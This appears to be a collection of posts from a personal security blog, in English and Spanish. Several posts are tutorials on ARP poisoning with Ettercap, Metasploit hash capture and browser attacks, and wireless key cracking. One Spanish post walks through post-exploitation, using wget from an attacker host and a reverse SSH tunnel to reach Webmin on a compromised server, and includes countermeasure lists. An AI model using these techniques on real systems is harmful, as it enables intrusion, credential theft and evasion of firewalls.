Technorati Tags:hackarandas, adrian puente z., infographic, phishing, gobankingrates.com
Generated By Technorati Tag Generator

Sources:
* http://www.gobankingrates.com/banking/protect-yourself-from-phishers-infographic/
* http://www.trusteer.com/sites/default/files/Phishing-Statistics-Dec-2009-FIN.pdf
Adrián Puente Z.

In the first part I talk about some basic concepts about SSH then I got for the hacking part so I give a demonstration based on the Mark Baggett’s post and I finish giving come SSH security tips based on my experience and some articles I found on Internet. I hope you found it interesting.

You can download it from here:

SSH Hacking and Good.Practices by Adrian Puente Z. (PDF Presentation)

Please visit my other Hacking Projects o Security Articles.

If you have something valuable to add to this presentation, please leave your comment.

References:

• Secure Shell from Wikipedia, the free encyclopedia
• Red Hat Linux 9: Red Hat Linux Reference Guide, Chapter 18. SSH Protocol
• Capturing SSH V1 & V2 Credentials with a MitM ssh honeypot by Mark Baggett
• Top 20 OpenSSH Server Best Security Practices
• Key-Based SSH Logins With PuTTY

Adrián Puente Z.

Technorati Tags:
Adrian Puente Z. hackarandas SSH hacking Man in the Middle Best Practices Security

This trick has 3 parts:

The Ettercap Filter

Based on the Irongeek’s Fun with Ettercap Filters and Bob’s Fulfor article I am creating the next ettercap filter:

The IP string 192.168.123.3:80 is the IP with the port where I have the browser_autopwn module wating for the connection and I am using the head and body tag because I want my attack to be the first thing they load. Now we compile the code:

Now we start the ettercap making the ARP Poisoning attack and injecting the HTML code:

The commands is running ettercap with the smb_down plugin that forces the connection to be a LM authentication, so it searches for the \\192.168.5.45\share\pixel.gif file that will be waiting the metasploit auxiliary/server/capture/smb module and will be logging the hashes. Also the Ettercap will be logging everything in the logfile and msgfile and making an ARP Poisoning between the first IPs in // and the second, I really recommend to use a little number of IPs and the Gateway to avoid making a DoS on the network. The -F is the parameter will load our brand new filter that will inject on the fly HTML code in the traffic between the victims, that’s why is important to use the gateway.

No we have to start our Metasploit attack. This is not new, I took the idea from Bob’s Fulfor article. I just gonna update it to work with the Metasploit Framework 3 and add it the browser_autopwn or the aurora attack.

In the moment I am writting this article I am using the metasploit v3.3.4-dev [core:3.3 api:1.0].

For the next modules you need to work with the root account because you need to open priviledges ports like 80, 135 and 445 for the attack to work. I am using Ubuntu Linux Karmic Koala, but you can use the Backtrack Project for this attack.

NTLM or LM Interception.

We start the attack.

I am running the service on both 139 and 445 because in my experience it improves the chances to catch an authentication hash. Now we have to wait and with some luck you sould see something like:

[*] Received 192.168.0.103:2281 MYDOMAIN\LAMEUSER LMHASH:7c83b9be93e202a4be355b75e982144b59bb9f836ec26200 NTHASH:9fc0fba25cb2817441a0ca8c003a4b68da83ef9e72514b2e OS:Windows 2002 2600 Service Pack 1 LM:Windows 2002 5.1

This is good but you can’t just use that hash to authenticate so you have to crack it using the idea from carnal0wnage’s blog article: Using the Metasploit SMB Sniffer Module NOTE: The tool halflm_second.rb is in the tools directory inside the Metsploit directory.

Attacking the Browser directly

Now we have to start the browser_autopwn

That’s it now you have to wait so a browser bite the bait and get a meterpreter console. This was about the Aurora new Metasploit’s module because is the new trend of the night but let’s face it, it is just part of the big world of the browser attacks. So if you are just lazy you can use the browser_autopwn module:

That’s it now you have to wait so a browser bite the bait and get a shell inside the computer with the user priviledges that is running the browser.

Happy Pentesting

Adrián Puente Z.

Technorati Tags:
hackarandas; Adrian Puente Z.; Metasploit; Hacker; Aurora IE ; Ettercap; arp poisoning; security; pentest; pentesting; hacking; hacker; smb; hashes; Tag generator

Hoy toca hablar de un tema muy interesante del que he estado investigando ya por bastante tiempo: Seguridad en Redes Inalámbricas. Un tema a mi parecer que a todos nos interesa pues a estas alturas es difícil hallar a una persona que navegue por Internet y que no haya empleado una red inalámbrica, ya sea en su escuela, hogar o trabajo.

Hace ya un tiempo fuí invitado por las representaciones e-T@M a la XXI Semana de Ingenierías del ITAM para dar una conferencia sobre el tema. Aunque el demo no salió muy bien la verdad es que nos divertimos mucho. Hace unos dias, en el área dónde laboro dentro de Sm4rt Security Services, me pidieron que diera una capacitación en este rubro.

La verdad no quiero extenderme mucho en este post porque ya he tocado el tema en otras entradas como Adicciones o Depredador en el Aire donde toco mas el tema del cracking de WEP y WPA. En la siguiente presentación, que puedes descargar desde la sección de  Security Articles, hago una investigación mas a fondo sobre los algoritmos de cifrado que emplea WEP, WPA y WPA2, así cómo sus vulnerabilidades.

Esta presentación ha sido creada para fines educativos de forma que las personas que administren o sean dueños de una red inalámbrica tengan los medios para entender como funciona esta y de la necesidad de configurar sus dispositivos correctamente. Ni yo ni Sm4rt Security Services somos responsable por el mal uso de esta información.

Esta presentación está licenciado bajo Creative Commons:

* Seguridad en Redes Inalámbricas  – 1.5 MB

Tags: seguridad redes inalambricas redes inalambricas seguridad itam wep wpa Sm4rt security services Adrian Puente Z. hackarandas.com ch0ks presentacion Turbo Tagger

Después de varias horas de verlo hacerse de la mala ceja se me ocurrieron varios puntos donde se podían hacer ataques:

Escenario

1. Servidor Web con Linux Fedora Core 3, obviamente con instalación por defecto
2. Servidor “protegido” por un FW Checkpoint.
1. Que nos bloquea la IP cada vez que hacemos un escaneo de puertos.
2. No tiene ACLs de salida del servidor, are you thinking what I am thinking?
   
3. Se ha logrado comprometer el servidor
1. Se tiene una shell creada por el php shell y que a su vez se ha conseguido otra con el Netcat conectándonos a nuestra máquina desde la máquina vícitma. Total el FW no tiene ACLs que bloqueen la salida de tráfico del servidor.
2. Tiene un IP Privada del otro lado, así que podemos suponer que están haciendo el port Forwarding al puerto 443.
3. Tiene el Webmin habilitado >:) pero bloqueado por el FW :’(

Planteamiento

¿Qué sigue? Obviamente escalar privilegios, encontrar mas servidores dentro de la DMZ y/o conseguir contraseñas. Ya se sacaron los usuarios con el comando cat /etc/passwd pero los hashes de las contraseñas  no ya que no disponemos de privilegios de root y hacer el viejo truco con Hydra de probar el mismo usuario y contraseñas contra un servicio es inútil por el FW.

¿Cómo podemos sopesar este problema? Como sabemos, el Webmin es una herramienta poderosísima para la admnistración del servidor pero cuenta con un sin fín de vulnerabilidades que, aunque son parchadas con cierta rapidez, si la instalación es por default o está sin administrar (abandonada) se puede comprometer la integridad del servidor con cierta facilidad.

Jutsu

  Creo que habemos pocos que conocemos los oscuros secretos y milenarias técnicas del SSH y los ocupamos con cierta regularidad. Aqui explico mi prueba de concepto para alcanzar el puerto de Webmin y poder comprometerlo:

Necesitamos tener una cuenta en una máquina y pueda acceder al servicio de SSH. Para esto podemos usar el Backtrack creamos una cuenta sin mayores privilegios. Dentro de esta cuenta creamos una llave pública de ssh para poder automatizar la autenticación y no perder la shell dentro del servidor:

# Creamos el directorio donde guardaremos la configuracion
mkdir ~/.ssh
# Creamos la llave sin contraseña para que sea mas cómoda de usar
ssh-keygen -t dsa
# Nos crea dos archivos que son la llave pública y la privada
id_dsa id_dsa.pub
# Renombramos la pública para poder usarla como autenticación
mv id_dsa.pub authorized_keys

Ahora creamos el siguiente archivo config:

Host atacante
# La IP o nombre de dominio que estamos usando
Hostname atacante.no-ip.org
RemoteForward 10000 127.0.0.1:10000
# Puerto que tengamos abierto y con el servicio de SSH corriendo
Port 1025
# El usuario que hallamos creado
User tunel
BatchMode yes
Compression yes
# La llave privada que no debe contener contraseña y nos dará acceso al usuario tunel
IdentityFile /tmp/.ssh/id_dsa
CompressionLevel 9
# Con esto nos saltamos el que nos pregunte que si añade la llave rsa al archivo.
StrictHostKeyChecking no
PubkeyAuthentication yes
UserKnownHostsFile /tmp/.ssh/known_hosts

Ahora subimos el archivo al servidor como tarball. Lo podemos hacer con la herramienta woof.

# En el lado del atacante
woof -p [PuertoAlcanzable] -i [IP] ~/.ssh

# En el lado de la victima
cd /tmp
wget [URL Cambiando la IP por la IP pública] -O - | tar zxvf -
cd .ssh
chmod 0600 *
ssh-agent bash
ssh-add
ssh -fNF config atacante

Recuerda que si estas detrás de un dispositivo que haga NAT debes hacer reenvío de puerto de forma que podamos alcanzar la máquina del atacante desde la máquina víctima y que el URL que le ingresaremos en el wget no es la IP privada sino la IP pública que tiene nuestro router. Los que tenemos cableacces estamos jodidos pero siempre podemos usar un servidor prestado que tenga una IP Pública XD.

Y si todo sale bien nos devolverá la línea de comando y veremos un proceso parecido al este:

ps ax | grep -i ssh
28659 ? Ss 0:30 ssh -fNF config atacante

Bien, ahora desde la máquina del atacante deberemos ver unos puertos parecidos a esto:

sudo netstat -ptuna | grep -i listen
tcp 0 0 127.0.0.1:10000 0.0.0.0:* LISTEN -

Perfecto! Si hasta ahora todo ha salido bien podremos entrar a la consola de administración del Webmin desde el navegador usando la siguiente URL: https://localhost:10000.

Nos vamos a la siguiente página y descargamos el exploit:

http://securitydot.net/xpl/exploits/vulnerabilities/articles/1164/exploit.html en Perl
http://www.milw0rm.com/exploits/1997 en PHP

Contramedidas

1. No instalas ningun aplicativo que no piensas dar mantenimiento en un servidor de producción.
2. Aparte del firewall corporativo es saludable instalar un firewall de host que proteja la máquina así la administración del FW queda en tus manos y no dependes de un tercero que no sabes que políticas maneja. APF es mi recomendación.
3. En los ACLs del firewall es buena idea bloquear cual tráfico que salga del servidor que no sea de tipo ESTABLISHED o que vaya única y exclusivamente a los servidores de actualizaciones, por este motivo es bueno tener un sistema de actualización local como el WSUS para Haselfroch.
4. Siempre, y repito, siempre has un hardeneo de tus servidores de producción, quita servicios que no uses y aquellos que necesitas pero son inseguros (Webmin, VNC) puedes hacer que escuchen localmente y accederlos por túneles de SSH.
5. Mantén un procedimiento para verificar la integridad de tus servidores como Tripwire.
6. Mantén una política de contraseñas complejas en tus usuarios, así, aúnque consigan los hashes de la contraseñas el romperlas puede llegar a ser virtualmente imposible.
7. Mantén actualizado tu sistema y las aplicaciones que tenga dentro, realiza auditorias constantes sobre tus aplicaciones Web para ver posibles agujeros de seguridad que puedan comprometer tu servidor. Para esto existen aplicaciones como GFI Languard y Nessus.

Aún siguiendo estos pasos no puedes ganrantizar que estará seguro tu servidor, siempre habrá una nueva vulnerabilidad o alguien que consiga brincarse la barda que has puesto. Hacer seguridad y cumplir al menos con las buenas prácticas de administración de servidores permiten mitigar los ataques que puedas recibir y que puedan afectar al negocio.

Tags: Seguridad, firewall, webmin, Secure Shell, SSH, Apache

Por ejemplo yo soy mucho de usar el Thunderbird para leer mis correos, el Sunbird para gestionar mis citas, mientras que navego el 99% con el Firefox y chateo con el Gaim, pues todo eso ya está para USB y podemos seguir con nuestas aplicaciones favoritas en cualquier computadora y sincronizar las funcionalidades de las aplicaciones con nuestro sistema base usando Unison o Rsync.

¿Pero qué mas podemos hacer? Ahora con la capacidad de las computadoras de bootear por casi cualquier periférico, que vaya, bootear por red es lo mas viejo del mundo el arrancar por USB es lo de hoy, es cosa de configurar el BIOS para lograr esto.

Pues con la novedad que se pueden arrancar sistemas operativos por USB, “Naaa eso es viejo!!!” me diras pero que tal arrancar un Windows XP desde USB todo montado sobre RAM, pues si, se pueden tener tantos sistemas operativos como quepan en nuestro USB porque ahora hasta se le puede instalar el GRUB al dispositivo.

Salió un nuevo proyecto para crear Live CDs de Windows XP que hasta ahora se ha hecho fácil. Aunque ya han existido proyectos como el ERD Commander de WinInternals recientemente adquirido por Microsoft y el BartPE XPE y creo que hasta hay un Live CD de Windows Vista.

Si pero que onda con correr Sistemas Operativos en el USB y encima arrancar con Grub. Los artículos están realmente interesantes, se los paso al costo:

* miniPE, BackTrack and Knoppix in an USB pen
* Running Hiren’s BootCd 6.0 from Bootable Usb Stick
* Installing Feather Linux to a USB drive

Adrian Puente Z.

Yo soy de la idea de no reinventar el hilo negro sino utilizar de la mejor forma los recursos que existen. En mi experiencia nada cómo usar un Live CD ya sea para recuperación , forencia o pentest. Entre los Linux Live CDs que he probado están:

* Feather Linux
* Damn Small Linux
* Tomsrtbt
* Knoppix
* Helix
* SleuthKit
* Operator
* Backtrack

Pero en realidad hay una gran lista de distribuciones Live CD de donde escoger. Para iniciar comentaré lo que se necesita para el rompimiento de redes inalámbricas:

La verdad es que se puede instalar desde cero la suite de Aircrack-ng pero en caso de que usemos Hasefroch podemos bootear la máquina con un Live CD especializado o cear una máquina de virtual en el VMplayer y una tarjera con el chipset indicado.

* Software

Podemos descargar el Backtrack que ya hoy está en su versión liberada 2
Se necesita el Backtrack o el WifiSlax que es una versión modificada del Backtrack en español y con muchas interfaces configuradas para que no tengamos que teclear el casi nada.

Para crear una máquina virtual podemos usar el VMplayer que es gratuito y creamos la máquina virtual con el vmxbuilder que igualmente no cuesta un peso.

* Hardware

¿Qué tarjeta comprar? Lo importante es el chipset no la tarjeta. En la documentacion de Aircrack que está en inglés y en español y tienen una sección que nos dice cuales son las mejores tarjetas para realizar esto, en mi caso he probado ya varias y hasta hice un articulo al respecto. Las que recomiendo ampliamente de chipset Ralink son:
* DWL-G122
* WUSB54g Version 4

* Tutoriales

En este video explican como crear una máquina virtual sin el VMware, aqui podemos aprender como correr un Live CD en Vmware

Video de como romper Wep con Backtrack 1

Mas videos de Craking WEP y WPA de aircrack y wifislax

* Lo mas nuevo

En lo último que encontré es el nuevo algoritmo para rompimiento de redes llamado aircrack-ptw y el soporte que se le ha dado al chipset Centrino ipw220 y el chipset Broadcom en el Wifislax. Igualmente ya sacaron el Airoscript que es la automatización de la suite aircrack para facilitar todo y se han generado algoritmos y métodos para romper WPA.

* Problemática

En México o al menos en el DF el 80% de los usuarios de internet compran el Kit de Prodigy inalámbrico el cual conectan, configuran y olvidan encontrando sumamente cómodo y chic la red inalámbrica sin estar conscientes de que el algoritmo de cifrado WEP es de 64 bits y la clave hex son 10 números sin letras haciendo sumamente sencillo romper la clave (te laten 10 mins) y entrar a la red del usuario, sí feliz usuario de Prodigy sienta miedo, usted puede estar hosteando a un intruso que ya ha tomado su access point, cambiado contraseña y puede estar realizando técnicas de arp poisoning para capturar su tráfico, contraseñas y hasta tarjetas de banco, porque de seguro tu eres de los que tiene su bancanet y cree que porque tiene SSL es seguro cuando el 90% de los usuarios dan aceptar sin pelar la advertencia del navegador. ¿Eres uno de ellos?

* Contramedidas

Algunas medidas para evitar tener colgado a alguien

* Si no requieres tener red inalámbrica no la pongas.
* Asigna contraseña al Access Point.
* Esconde el ESSID que aún así se puede obtener y cámbiaselo a algo que no diga 2WIRE[HACKME].
* Usa de pérdida WEP de 128, sí puedes WPA aunque los dispositivos mas viejos no lo soportan.
* Filtra las MACs de las máquinas si no tienes demasiadas aunque esto se puede hacer un infierno en grandes redes.
* Cambia seguido la clave WEP y la contraseña del Access Point.
* Revisa tu Access cada que puedas, este logea las máquinas que se han conectado, si ves alguna máquinas desconocida cambia las contraseñas.
* Asigna firewalls personales a tus máquinas y quita carpetas compartidas que no sean necesarias y las que si ponles permisos por grupos o usuarios.
* Ponle contraseñas a los usuarios de las máquinas, al menos al Administrador.

* Conclusión

No hay nada seguro en realidad pero siempre podremos mitigar los ataques teniendo algo de cuidado y propagando una cultura de la seguridad. Alguna vez escuché que si tienes un coche este conlleva responsabilidades como el pago de tenencia y la verificación, con la seguridad es lo mismo, si uno compra un dispositivo uno se arriesga a las vulverabilidades que trae consigo este, el desconocer los medios para protegernos y/o no llevarlos a cabo nos hacen vícitmas potenciales, está en cada uno mitigar estas posibles amenazas.

Adrián Puente Z.

Encontré el Tiny Web Gallery que sobrepasó mis expectativas, aparte de que es realmente fácil de utilizar y administrar. ¿No te ha pasado que tienes cientos de pics pero el problema es que hiciste respaldo en multiples directorios en diferentes partes de tu sistema? En fin, hice un script que me automatiza la creación de la galeria escalando las imágenes a 800×600, ordenándolas y etiquetándolos con una leyenda que describa la situación del evento, para muestra un botón:

En mi caso me bajé el XAMPP que es un excelente proyecto de que incluye Apache, PHP 4 o 5 y MySQL extremadamente amigable para administrar. Vamos a descargarlo aqui y seguimos las instrucciones, es importante cambiarle las contraseñas a los servicios de XAMPP para un servidor en producción sino luego no chilles si te cambian la página de inicio. Recuerda que el TWG funciona con PHP4 al menos yo no lo he probado con el PHP5 asi que cambiamos con el siguiente comando:

sudo /opt/lampp/lampp security
sudo /opt/lampp/lampp php4
sudo /opt/lampp/lampp restart


Ahora descargamos el TWG de aqui lo descargamos en /tmp y lo ponemos en la siguiente carpeta /opt/lampp/htdocs. Es importante cambiarle el grupo y darle permisos de escritura al apache pues de otra forma no podremos administar e TWG.

cd /opt/lampp/htdocs/
unzip -a /tmp/twg*.zip
mv twg* galeria
chgrp -R nobody galeria
chmod -R g+w galeria


Listo! ya tenemos instalado el Apache con el PHP4 y el TWG en nuestra máquina y podemos verlo andar en la siguiente direccion http://localhost/galeria . Debes de poder ver la galería de prueba, cosa que queremos pues significa que el “juguete” está andando, después puedes borrar esta galeria para sólo dejar la tuya. Ahora vamos a administrarla, RECUERDA CAMBIAR LOS PERMISOS. entramos a la siguiente dirección http://localhost/galeria/admin/index.php con el usuario admin y la contraseña twg_admin y nos llevará a la primera página de administración donde no exhorta cambiar el passwd cosa que recomiendo ampliamente así como cambiar el login del usuario por defecto por uno menos convencional, ya sabes, vivo en la paranoia.

Para irnos directo: en el menú izquierdo vemos una liga que dice “Configure TWG” la pulsamos y en la opción “Enable session caching of directorys and files” le damos false. Cuando estamos actualizando la galeria es bueno tenerlo en false así regenera el caché y podemos ver la galeria terminada. Cuando acabemos no olvides poner en true esta opción, es mucho mas óptimo tenerlo habilitado cuando ya se encuentra en producción. Las imágenes se guardan en carpetas en la siguiente dirección /opt/lampp/htdocs/galeria/pictures Cada galeria le puedes poner una carpeta y dentro de cada carpeta puedes poner una imagen llamada folder.png para que sea el ícono de la Galeria así como un archivo foldername.txt para la descripción donde puedes poner HTML y hacerlo mas “eye candy“.

Vamos al famoso Script que nos automatizará la tarea de procesamiento de imágenes. Es importente tener el comando convert del Imagemagick. El script doGallery

#!/bin/bash
# Script hecho por Adrian Puente.

if [ $# -lt 2 ]
then
        echo -e "Sintaxis: `basename ${0}` [Prefix Pics] ["Desc"]"
        echo -e "Ejemplo: `basename ${0}` navidad.familia.2007 \\"Navidad con la Familia 2007\\".\\n"
        echo -e "Es importante poner las descripciones con espacios entre comillas."
        echo -e "Terminando el script una carpeta 800x600 contendra las imagenes procesadas."
        exit 0
fi

[ -f PROCESADO.TXT ] \&\& cat PROCESADO.TXT \&\& echo "Borrar el archivo PROCESADO.TXT" \&\& exit 

PREF=${1}
DESC=${2}
OK="\\033[5;32;1mHECHO\\033[0m"
NO="\\033[5;31;1mERROR\\033[0m"

[ ! -d 800x600 ] \&\& mkdir 800x600
# Renombramos las pics para mayor comodidad.
CTR=0;
for i in `ls -1 *.jpg *.JPG`
do
        if [ ${CTR} -lt 10 ]
        then
                NUM=00${CTR}
        else if [ ${CTR} -lt 100 ]
        then
                        NUM=0${CTR}
                else
                        NUM=${CTR}
                fi
        fi
        CTR=`expr ${CTR} + 1`
        echo -en "Convirtiendo ${i} --> ${PREF}-${NUM}.jpg "
        convert ${i} -scale 800x600 -fill white \\
                     -box \\#00000080 -gravity South \\
                     -pointsize 25 -annotate +0+5 "${DESC}" \\
                     800x600/${PREF}-${NUM}.jpg \&\& echo -e [${OK}] || echo -e [${NO}]
done

echo ${DESC} > 800x600/foldername.txt
echo -e "Directorio procesado para galeria el "`date +%F` > PROCESADO.TXT

El script te crea un archivo foldername.txt con la descripción que escogimos que es compatible con el TWG, también crea un archivo llamado PROCESADO.TXT que guarda la fecha en que esa carpeta fue procesada para no tener múltiples instancias de las carpetas procesadas. Ahora renombramos la carpeta 800×600 con un nombre que describa la situación, no sé, mi_cumple_2007, cuando termino restauro la opción del cache y en mi caso sincronizo los directorios con rsync, así puedo tener la galeria “en desarrollo” en mi máquina y cuando queda como quiero la subo, así tengo respaldo y no consumo el ancho de banda de mi site, ok muy ñoño pero no hay porqué ser ineficientes.

rsync --progress -avz -e ssh /opt/lampp/htdocs/galeria usuario@sitioweb:camino/a/los/htdocs


Si tienes algún problema extraño recuerda los permisos . En mi caso mi usuario y grupo en el sitio web es diferente al que tengo en mi máquina así que es bueno verificar los permisos de los grupos. Si quieres aumentarle la seguridad a tu sitio cambia el nombre de la carpeta admin por algún nombre difícil de adivinary accesa por la misma carpeta /index.php. Listo! la galeria ha sido creada. Enjoy

La galería de este su Blog es: http://www.hackarandas.com/galeria

Adrián Puente Z.

¿Porqué nació esta adicción? Creo que ha sido mi obsesión por encontrar la tarjeta de red perfecta para romper redes inalámbricas entonces me vi envuelto en la modificación (mas bien destrozamiento) de mi tarjeta WUSB54G para añadirle una antena de 9 dbi y me detuve con la frustración de la tarjeta X-Media que nunca me funcionó.

Bueno todo esto viene a que ando escribiendo un artículo de cómo romper redes inalámbricas y entre mis tarjetas que funcionan con el Backtrack y el WifiSlax estos son mis favoritos:

La DWL-G650 de D-Link. La mejor tarjeta que he tenido. Con esta mi récord sobre una red de Prodigy es de 18 mins y si le pones una moneda de 10 pesos aumentas su alcance (por ridículo que suene). El problema es que la tecnología pcmcia está de salida y ya las nuevas laptops no la usan. Lo interesante de esta tarjeta es que tiene chipset Prism que permite la inyección de paquetes. Esta tarjeta la uso en una máquina Pentium con 32 de RAM que sólo tiene Backtrack instalado y funciona de maravilla.

El dispositivo WUSB54G es muy bueno y al ser conectado por USB puedes conectarlo donde sea. Tiene un chipset Ralink que detecta perfectamente el Backtrack como rausb0 y es relativamente barato. En lo que se refiere a inyección de paquetes es muy lento y se llega a trabar por lo que desarrollé un script para que reiniciara la inyección cada X tiempo. Es mi segunda favorita y hay la posibilidad de adaptarle una antena para aumentar su alcance. Yo estoy haciendo el intento pero he descubierto que soy particularmente torpe al usar el cautín destruyendo todo en un rango de metro y medio.

También tengo una vieja latop Averatec que tiene igualmente el chipset Ralink y funciona de maravilla hasta que le troné el procesador por calor. El problema fue que no hallaba quien me la arreglara hasta que hallé al Ingeniero Miguel en la plaza de la computación en lel piso de arriba en el local 62 por la zona de comida. Me eché la laptop al intentar reconstruirle el cargador y genero mal la corriente aparte de que un ventilador le falló y ya no enfriaba. Ahora le compré una de esas bases con ventiladores.

Al parecer el chipset Centrino tiene la capacidad para inyectar paquetes y poder romper redes usando el aireplay-ng parchado que ya trae Wifislax. La verdad es un maquinón y a diferencia de otras personas Dell nunca me ha dado problemas, en fin… de todas formas es la máquina de la oficina.

Ya para terminar a mi chica le compré una tarjeta de red Encore muy muy barata y muy muy buena. Normalmente la calidad del hardware es proporcional al precio pero esta tarjeta realmente rompió con los esquemas, hasta ha funcionado mejor que otras que son mas caras y se ven mas finas. Por otro lado compré 2 tarjetas XMedia y ambas tienen chipset Ralink pero aún asi no le ganaron a la tarjeta Encore. Por otro lado la tarjeta XMedia IT-WL542 tiene Chipset Ralink y la detecta el Bactrack 2 Final la echó a andar y duró como 5 mins funcionando pero de ahi en fuera ni Ubuntu ni Debian me la detectaron bien. La verdad no la recomiendo para Linux aunque está muy barata la tarjeta ya para Hasefroch es otra historia.

Por lo pronto tengo que encontrarle un bonito hogar al montón de tarjetas que realmente no utilizo y tratar de contenerme mas pues me hace mas falta ropa que hardware. ¿Alguien está interesado en una tarjeta pcmcia bla?

Adrián Puente Z.